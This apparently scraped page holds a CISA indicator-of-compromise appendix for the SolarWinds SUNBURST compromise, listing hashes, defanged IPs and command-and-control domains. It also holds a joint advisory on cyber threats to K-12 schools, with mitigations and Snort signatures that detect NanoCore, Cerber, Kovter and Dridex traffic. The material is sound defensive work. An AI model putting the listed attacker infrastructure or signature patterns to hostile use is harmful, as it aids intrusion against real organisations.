00f66fc1f74b9ecabf1aafc123f2ef0f94edc258 1412c74537fc769b5dd34b4c1da0bf48 2020.2.1 2020.2.1 HF1 No 2020.2.15300.12766 143632672dcb6ef324343739636b984f5c52ece0e078cfee7c6cac4a3545403a 8acbcc116baa80262d09635bd312018372fefca6 2d9b1245d42bb9f928da2528bb057de2 2020.2.1 HF2 No 2020.2.15300.12901 cc870c07eeb672ab33b6c2be51b173ad5564af5d98bfc02da02367a9e349a76f babf9af689033fa2a825528715ae6dc625619e65 610ec1ab7701b410df1e309240343cdf   Appendix B: Indicators of Compromise Due to the operational security posture of the adversary, most observable IOCs are of limited utility; however, they can be useful for quick triage. Below is a compilation of IOCs from a variety of public sources provided for convenience. CISA will be updating this list with CISA developed IOCs as our investigations evolve. Note: removed two IOCs (12.227.230[.]4, 65.153.203[.]68) and corrected typo, updated December 19, 2020; added multiple new IOCs on January 6, 2021 (new IOCs added are at the bottom of the table); corrected typos, added new IOC, and deleted duplicate hash on January 7, 2021. Table 2: Indicators of Compromise  IOC   Type   Notes  References   Source  32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77  hash  Backdoor.Sunburst  https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/    a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc hash Backdoor.Sunburst https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-   attacks/   d3c6785e18fba3749fb785bc313cf8346182f532c59172b69adfb31b96a5d0af hash Backdoor.Sunburst https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber- attacks/   13.59.205[.]66 IPv4 DEFTSECURITY[.]com https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity deftsecurity[.]com domain Domain malicious on VT, registered with  Amazon, hosted on US IP address 13.59.205.66, malware repository, spyware and malware https://www.virustotal.com/gui/domain/deftsecurity.com/details https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 54.193.127[.]66 IPv4 FREESCANONLINE[.]com  https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/   ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c hash No info available https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/   c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77 hash No info available https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/   dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b hash No info available https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/   eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed hash No info available https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/   avsvmcloud[.]com domain Reported by FireEye/ The malicious DLL calls out to a remote network infrastructure using the domains avsvmcloud[.]com. to prepare possible second-stage payloads, move laterally in the organization, and compromise or exfiltrate data. Malicious on VT. Hosted on IP address 20.140.0.1, which is registered with Microsoft.  malware callhome, command and control https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ FireEye Report Talos Volexity 3.87.182[.]149 IPv4 Resolves to KUBECLOUD[.]com, IP registered to Amazon. Tracked by Insikt/RF as tied to SUNBURST intrusion activity. https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 3.16.81[.]254 IPv4 Resolves to SEOBUNDLEKIT[.]com, registered to Amazon. Tracked by Insikt/RF as tied SUNBURST intrusion activity. https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 54.215.192[.]52 IPv4 THEDOCCLOUD[.]com https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134  hash Trojan.MSIL.SunBurst ttps://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber- attacks/   ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 hash Trojan.MSIL.SunBurst https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber- attacks/   8.18.144[.]11 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]12 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]9 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]20 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]40 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/  Volexity 8.18.144[.]44 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]62 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]130 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]135 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]136 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]149 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]156 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]158 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]165 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]170 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]180 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.144[.]188 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]3 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]21 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]33 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]36 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]131 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]134 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]136 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]139 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]150 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]157 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 8.18.145[.]181 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 13.57.184[.]217 IPv4 (corrected typo in this IOC December 18, 2020) https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 18.217.225[.]111 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 18.220.219[.]143 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 20.141.48[.]154 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 34.219.234[.]134 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.1[.]3 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.21[.]54 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.48[.]22 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/  Volexity 184.72.101[.]22 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.113[.]55 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.145[.]34 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.209[.]33 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.212[.]52 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.224[.]3 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.229[.]1 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.240[.]3 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 184.72.245[.]1 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 196.203.11[.]89 IPv4   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/  Volexity digitalcollege[.]org domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity freescanonline[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity globalnetworkissues[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity kubecloud[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity lcomputers[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity seobundlekit[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity solartrackingsystem[.]net domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity thedoccloud[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/  Volexity virtualwebdata[.]com domain    https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity webcodez[.]com domain   https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 hash   https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public   c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 hash   https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public   ervsystem[.]com domain New January 6, 2021 Resolves to 198.12.75[.]112   https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds Symantec infinitysoftwares[.]com domain New January 6, 2021 Updated January 7, 2021: corrected typo in this IOC; updated source https://otx.alienvault.com/pulse/5fdce61ef056eff2ce0a90de   mobilnweb[.]com domain New January 6, 2021 Updated January 7, 2021: updated source   CISA 02AF7CEC58B9A5DA1C542B5A32151BA1 Hash New January 6, 2021 Sunburst Installer File Name(s): CORE-2019.4.5220.20574-SolarWinds-Core-v2019.4.5220-Hotfix5.msp     Symantec  Sunburst: Supply Chain Attack Targets Solar Winds Users 0548eedb3d1f45f1f9549e09d00683f3a1292ec5 Hash New January 6, 2021 SSL hash for 198.12.75[.]112       0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589 Hash New January 6, 2021   CISA 1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c Hash New January 6, 2021 Sunburst Backdoor https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds Symantec 1b476f58ca366b54f34d714ffce3fd73cc30db1a Hash New January 6, 2021 Sunburst Installer File Name(s): CORE-2019.4.5220.20574-SolarWinds-Core-v2019.4.5220-Hotfix5.msp   Symantec  Sunburst: Supply Chain Attack Targets Solar Winds Users 20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9 Hash New January 6, 2021   CISA 2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d Hash New January 6, 2021 https://otx.alienvault.com/pulse/5fd6df943558e0b56eaf3da8 CISA 2dafddbfb0981c5aa31f27a298b9c804e553c7bc Hash New January 6, 2021     6e4050c6a2d2e5e49606d96dd2922da480f2e0c70082cc7e54449a7dc0d20f8d Hash New January 6, 2021   CrowdStrike 92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690 Hash New January 6, 2021   CISA a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d Hash New January 6, 2021   CISA a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2 Hash New January 6, 2021   CISA b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07 Hash New January 6, 2021 Sunburst Backdoor https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds Symantec b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666 Hash New January 6, 2021 https://otx.alienvault.com/pulse/5fd6df943558e0b56eaf3da8   cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6 Hash New January 6, 2021   CISA e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d Hash New January 6, 2021   CISA e70b6be294082188cbe0089dd44dbb86e365f6a2 Hash New January 6, 2021 SSL hash for 107.152.35[.]77     fd15760abfc0b2537b89adc65b1ff3f072e7e31c Hash New January 6, 2021 https://otx.alienvault.com/pulse/5fd6df943558e0b56eaf3da8   ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8 Hash New January 6, 2021 https://otx.alienvault.com/pulse/5fd6df943558e0b56eaf3da8     107.152.35[.]77 IPv4 New January 6, 2021 Resolves to infinitysoftwares[.]com     13.59.205[.]66 IPv4 New January 6, 2021 https://otx.alienvault.com/pulse/5fd825b7fa4eb2223a0cf812   173.237.190[.]2 IPv4 New January 6, 2021   CISA 198.12.75[.]112 IPv4 New January 6, 2021 Resolves to ervsystem[.]com Updated January 7, 2021: Corrected typo in resolves to domain   Symantec  Sunburst: Supply Chain Attack Targets Solar Winds Users 20.141.48[.]154 IPv4 New January 6, 2021 Updated January 7, 2021: updated reference and source https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ Volexity 34.203.203[.]23 IPv4 New January 7, 2021   CISA References [1] Volexity: Dark Halo Leverages SolarWinds Compromise to Breach Organizations [2] SolarWinds Security Advisory [3] FireEye: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor [4] GitHub: Azure / Azure-Sentinel - ADFSDomainTrustMods.yaml [5] GitHub: CISA: Sparrow [6] Lockheed Martin: Seven Ways to Apply the Cyber Kill Chain with a Threat Intelligence Platfor Revisions Initial version: December 17, 2020 December 18, 2020: Updated note regarding initial vectors and key takeaways. December 19, 2020: Updated mitigation guidance, indicators of compromise table, and provided a downloadable STIX file of the IOCs. December 21, 2020: Added reference to NSA Cybersecurity Advisory: Detecting Abuse of Authentication Methods December 23, 2020: Added link to CISA.gov/supply-chain-compromise January 06, 2021: Updated Initial Access Vectors, Mitigations, and IOCs January 07, 2021: Updated IOCs Febraury 08, 2021: Updated IOCs April 13, 2021: Fixed Spelling Error April 15, 2021: Updated with Attribution Statement and SUNSHUTTLE MAR This product is provided subject to this Notification and this Privacy & Use policy.

  • AA20-345A: Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data
    by CISA on 10 Dicembre 2020 at 5:00 pm

    Original release date: December 10, 2020SummaryThis Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC). The FBI, CISA, and MS-ISAC assess malicious cyber actors are targeting kindergarten through twelfth grade (K-12) educational institutions, leading to ransomware attacks, the theft of data, and the disruption of distance learning services. Cyber actors likely view schools as targets of opportunity, and these types of attacks are expected to continue through the 2020/2021 academic year. These issues will be particularly challenging for K-12 schools that face resource limitations; therefore, educational leadership, information technology personnel, and security personnel will need to balance this risk when determining their cybersecurity investments. Click here for a PDF version of this report. Technical DetailsAs of December 2020, the FBI, CISA, and MS-ISAC continue to receive reports from K-12 educational institutions about the disruption of distance learning efforts by cyber actors. Ransomware The FBI, CISA, and MS-ISAC have received numerous reports of ransomware attacks against K-12 educational institutions. In these attacks, malicious cyber actors target school computer systems, slowing access, and—in some instances—rendering the systems inaccessible for basic functions, including distance learning. Adopting tactics previously leveraged against business and industry, ransomware actors have also stolen—and threatened to leak—confidential student data to the public unless institutions pay a ransom. According to MS-ISAC data, the percentage of reported ransomware incidents against K-12 schools increased at the beginning of the 2020 school year. In August and September, 57% of ransomware incidents reported to the MS-ISAC involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July. The five most common ransomware variants identified in incidents targeting K-12 schools between January and September 2020—based on open source information as well as victim and third-party incident reports made to MS-ISAC—are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil. Malware Figure 1 identifies the top 10 malware strains that have affected state, local, tribal, and territorial (SLTT) educational institutions over the past year (up to and including September 2020). Note: These malware variants are purely opportunistic as they not only affect educational institutions but other organizations as well. ZeuS and Shlayer are among the most prevalent malware affecting K-12 schools. ZeuS is a Trojan with several variants that targets Microsoft Windows operating systems. Cyber actors use ZeuS to infect target machines and send stolen information to command-and-control servers. Shlayer is a Trojan downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malicious advertising posing as a fake Adobe Flash updater. Note: Shlayer is the only malware of the top 10 that targets MacOS; the other 9 affect Microsoft Windows operating systems Figure 1: Top 10 malware affecting SLTT educational institutions   Distributed Denial-of-Service Attacks Cyber actors are causing disruptions to K-12 educational institutions—including third-party services supporting distance learning—with distributed denial-of-service (DDoS) attacks,  which temporarily limit or prevent users from conducting daily operations. The availability of DDoS-for-hire services provides opportunities for any motivated malicious cyber actor to conduct disruptive attacks regardless of experience level. Note: DDoS attacks overwhelm servers with a high level of internet traffic originating from many different sources, making it impossible to mitigate at a single source. Video Conference Disruptions Numerous reports received by the FBI, CISA, and MS-ISAC since March 2020 indicate uninvited users have disrupted live video-conferenced classroom sessions. These disruptions have included verbally harassing students and teachers, displaying pornography and/or violent images, and doxing meeting attendees (Note: doxing is the act of compiling or publishing personal information about an individual on the internet, typically with malicious intent). To enter classroom sessions, uninvited users have been observed: Using student names to trick hosts into accepting them into class sessions, and Accessing meetings from either publicly available links or links shared with outside users (e.g., students sharing links and/or passwords with friends). Video conference sessions without proper control measures risk disruption or compromise of classroom conversations and exposure of sensitive information. Additional Risks and Vulnerabilities In addition to the recent reporting of distance learning disruptions received by the FBI, CISA, and MS-ISAC, malicious cyber actors are expected to continue seeking opportunities to exploit the evolving remote learning environment. Social Engineering Cyber actors could apply social engineering methods against students, parents, faculty, IT personnel, or other individuals involved in distance learning. Tactics, such as phishing, trick victims into revealing personal information (e.g., password or bank account information) or performing a task (e.g., clicking on a link). In such scenarios, a victim could receive what appears to be legitimate email that: Requests personally identifiable information (PII) (e.g., full name, birthdate, student ID), Directs the user to confirm a password or personal identification number (PIN), Instructs the recipient to visit a website that is compromised by the cyber actor, or Contains an attachment with malware. Cyber actors also register web domains that are similar to legitimate websites in an attempt to capture individuals who mistype URLs or click on similar looking URLs. These types of attacks are referred to as domain spoofing or homograph attacks. For example, a user wanting to access www.cottoncandyschool.edu could mistakenly click on www.cottencandyschool.edu (changed “o” to an “e”) or www.cottoncandyschoo1.edu (changed letter “l” to a number “1”) (Note: this is a fictitious example to demonstrate how a user can mistakenly click and access a website without noticing subtle changes in website URLs). Victims believe they are on a legitimate website when, in reality, they are visiting a site controlled by a cyber actor. Technology Vulnerabilities and Student Data Whether as collateral for ransomware attacks or to sell on the dark web, cyber actors may seek to exploit the data-rich environment of student information in schools and education technology (edtech) services. The need for schools to rapidly transition to distance learning likely contributed to cybersecurity gaps, leaving schools vulnerable to attack. In addition, educational institutions that have outsourced their distance learning tools may have lost visibility into data security measures. Cyber actors could view the increased reliance on—and sharp usership growth in—these distance learning services and student data as lucrative targets. Open/Exposed Ports The FBI, CISA, and MS-ISAC frequently see malicious cyber actors exploiting exposed Remote Desktop Protocol (RDP) services to gain initial access to a network and, often, to manually deploy ransomware. For example, cyber actors will attack ports 445 (Server Message Block [SMB]) and 3389 (RDP) to gain network access. They are then positioned to move laterally throughout a network (often using SMB), escalate privileges, access and exfiltrate sensitive information, harvest credentials, or deploy a wide variety of malware. This popular attack vector allows cyber actors to maintain a low profile, as they are using a legitimate network service that provides them with the same functionality as any other remote user. End-of-Life Software End-of-Life (EOL) software is regularly exploited by cyber actors—often to gain initial access, deface websites, or further their reach in a network. Once a product reaches EOL, customers no longer receive security updates, technical support, or bug fixes. Unpatched and vulnerable servers are likely to be exploited by cyber actors, hindering an organization’s operational capacity. MitigationsPlans and Policies The FBI and CISA encourage educational providers to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, institutions may be unable to continue teaching and administrative operations. Evaluating continuity and capability will help identify potential operational gaps. Through identifying and addressing these gaps, institutions can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. The FBI and CISA suggest K-12 educational institutions review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by cyber actors. Network Best Practices Patch operating systems, software, and firmware as soon as manufacturers release updates. Check configurations for every operating system version for educational institution-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled. Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts. Use multi-factor authentication where possible. Disable unused remote access/RDP ports and monitor remote access/RDP logs. Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy. Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Audit logs to ensure new accounts are legitimate. Scan for open or listening ports and mediate those that are not needed. Identify critical assets such as student database servers and distance learning infrastructure; create backups of these systems and house the backups offline from the network. Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment. Set antivirus and anti-malware solutions to automatically update; conduct regular scans. User Awareness Best Practices Focus on awareness and training. Because end users are targeted, make employees and students aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities. Ensure employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently. Monitor privacy settings and information available on social networking sites. Ransomware Best Practices The FBI and CISA do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, regardless of whether your organization decided to pay the ransom, the FBI urges you to report ransomware incidents to your local FBI field office. Doing so provides the FBI with the critical information they need to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law. In addition to implementing the above network best practices, the FBI and CISA also recommend the following: Regularly back up data, air gap, and password protect backup copies offline. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location. Denial-of-Service Best Practices Consider enrolling in a denial-of-service mitigation service that detects abnormal traffic flows and redirects traffic away from your network. Create a partnership with your local internet service provider (ISP) prior to an event and work with your ISP to control network traffic attacking your network during an event. Configure network firewalls to block unauthorized IP addresses and disable port forwarding. Video-Conferencing Best Practices Ensure participants use the most updated version of remote access/meeting applications. Require passwords for session access. Encourage students to avoid sharing passwords or meeting codes. Establish a vetting process to identify participants as they arrive, such as a waiting room. Establish policies to require participants to sign in using true names rather than aliases. Ensure only the host controls screensharing privileges. Implement a policy to prevent participants from entering rooms prior to host arrival and to prevent the host from exiting prior to the departure of all participants. Edtech Implementation Considerations When partnering with third-party and edtech services to support distance learning, educational institutions should consider the following: The service provider’s cybersecurity policies and response plan in the event of a breach and their remediation practices: How did the service provider resolve past cyber incidents? How did their cybersecurity practices change after these incidents? The provider’s data security practices for their products and services (e.g., data encryption in transit and at rest, security audits, security training of staff, audit logs); The provider’s data maintenance and storage practices (e.g., use of company servers, cloud storage, or third-party services); Types of student data the provider collects and tracks (e.g., PII, academic, disciplinary, medical, biometric, IP addresses); Entities to whom the provider will grant access to the student data (e.g., vendors); How the provider will use student data (e.g., will they sell it to—or share it with—third parties for service enhancement, new product development, studies, marketing/advertising?); The provider’s de-identification practices for student data; and The provider’s policies on data retention and deletion. Malware Defense Table 1 identifies CISA-created Snort signatures, which have been successfully used to detect and defend against related attacks, for the malware variants listed below. Note: the listing is not fully comprehensive and should not be used at the exclusion of other detection methods. Table 1: Malware signatures Malware Signature NanoCore alert tcp any any -> any $HTTP_PORTS (msg:"NANOCORE:HTTP GET URI contains 'FAD00979338'"; sid:00000000; rev:1; flow:established,to_server; content:"GET"; http_method; content:"getPluginName.php?PluginID=FAD00979338"; fast_pattern; http_uri; classtype:http-uri; metadata:service http;)  Cerber alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'host|3a 20|polkiuj.top'"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"host|3a 20|polkiuj.top|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)  Kovter alert tcp any any -> any $HTTP_PORTS (msg:"Kovter:HTTP URI POST to CnC Server"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"POST / HTTP/1.1"; depth:15; content:"Content-Type|3a 20|application/x-www-form-urlencoded"; http_header; depth:47; fast_pattern; content:"User-Agent|3a 20|Mozilla/"; http_header; content:!"LOADCURRENCY"; nocase; content:!"Accept"; http_header; content:!"Referer|3a|"; http_header; content:!"Cookie|3a|"; nocase; http_header; pcre:"/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/P"; pcre:"/User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\nContent-Length\x3a\x20[1-5][0-9]{2,3}\r\n(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$/H"; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:nonstd-tcp; metadata:service http;) Dridex alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI GET contains 'invoice_########.doc' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; content:"invoice_"; http_uri; fast_pattern:only; content:".doc"; nocase; distance:8; within:4; content:"GET"; nocase; http_method; classtype:http-uri; metadata:service http;) alert tcp any any -> any $HTTP_PORTS (msg:"HTTP Client Header contains 'Host|3a 20|tanevengledrep ru' (DRIDEX)"; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:"Host|3a 20|tanevengledrep|2e|ru|0d 0a|"; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;) Contact InformationTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov. 